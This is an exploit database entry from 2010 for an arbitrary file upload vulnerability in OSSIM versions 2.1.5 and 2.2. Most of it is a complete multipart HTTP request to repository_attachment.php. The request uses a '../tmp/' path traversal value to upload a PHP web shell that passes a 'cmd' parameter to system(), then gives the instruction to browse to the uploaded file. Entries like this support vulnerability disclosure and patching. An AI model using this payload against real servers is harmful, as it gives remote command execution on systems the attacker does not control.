OSSIM (repository_attachment.php) Arbitrary File Upload Vulnerability

2010-03-18T00:00:00
ID 1337DAY-ID-11356
Type zdt
Reporter Nahuel Grisolia
Modified 2010-03-18T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            =====================================================================
OSSIM (repository_attachment.php) Arbitrary File Upload Vulnerability
=====================================================================

Vulnerable:  	 OSSIM os-sim 2.1.5
OSSIM os-sim 2.2

Not Vulnerable:  	 OSSIM os-sim 2.2.1 

POST /ossim/repository/repository_attachment.php HTTP/1.1
Host: www.example.com
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.5) Gecko/20091109 Ubuntu/9.10
(karmic) Firefox/3.5.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Cookie: PHPSESSID=(YOUR_COOKIE_HERE)
Content-Type: multipart/form-data; boundary=---------------------------
11440981608429693121899471469
Content-Length: 689
-----------------------------11440981608429693121899471469
Content-Disposition: form-data; name="id_document"
../tmp/
-----------------------------11440981608429693121899471469
Content-Disposition: form-data; name="atchfile"; filename="R4nd0mF1l31tdoesntmatter.php"
Content-Type: text/vnd.wap.wml
<HTML><BODY>
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<?
if($_GET['cmd']) {
system($_GET['cmd']);
}
?>
</pre>
</BODY></HTML>
-----------------------------11440981608429693121899471469--
 
and then, browse /ossiminstall/tmp/_(DOC_ID).php




#  0day.today [2018-04-03]  #